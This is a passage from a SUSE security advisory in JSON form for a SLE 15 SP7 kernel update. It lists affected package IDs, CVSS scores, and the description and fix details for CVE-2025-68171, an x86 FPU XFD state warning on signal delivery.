"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "low"
}
],
"title": "CVE-2025-40363"
},
{
"cve": "CVE-2025-68171",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68171"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/fpu: Ensure XFD state on signal delivery\n\nSean reported [1] the following splat when running KVM tests:\n\n WARNING: CPU: 232 PID: 15391 at xfd_validate_state+0x65/0x70\n Call Trace:\n \u003cTASK\u003e\n fpu__clear_user_states+0x9c/0x100\n arch_do_signal_or_restart+0x142/0x210\n exit_to_user_mode_loop+0x55/0x100\n do_syscall_64+0x205/0x2c0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\nChao further identified [2] a reproducible scenario involving signal\ndelivery: a non-AMX task is preempted by an AMX-enabled task which\nmodifies the XFD MSR.\n\nWhen the non-AMX task resumes and reloads XSTATE with init values,\na warning is triggered due to a mismatch between fpstate::xfd and the\nCPU\u0027s current XFD state. fpu__clear_user_states() does not currently\nre-synchronize the XFD state after such preemption.\n\nInvoke xfd_update_state() which detects and corrects the mismatch if\nthere is a dynamic feature.\n\nThis also benefits the sigreturn path, as fpu__restore_sig() may call\nfpu__clear_user_states() when the sigframe is inaccessible.\n\n[ dhansen: minor changelog munging ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68171",
"url": "https://www.suse.com/security/cve/CVE-2025-68171"
},
{
"category": "external",
"summary": "SUSE Bug 1255255 for CVE-2025-68171",
"url": "https://bugzilla.suse.com/1255255"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
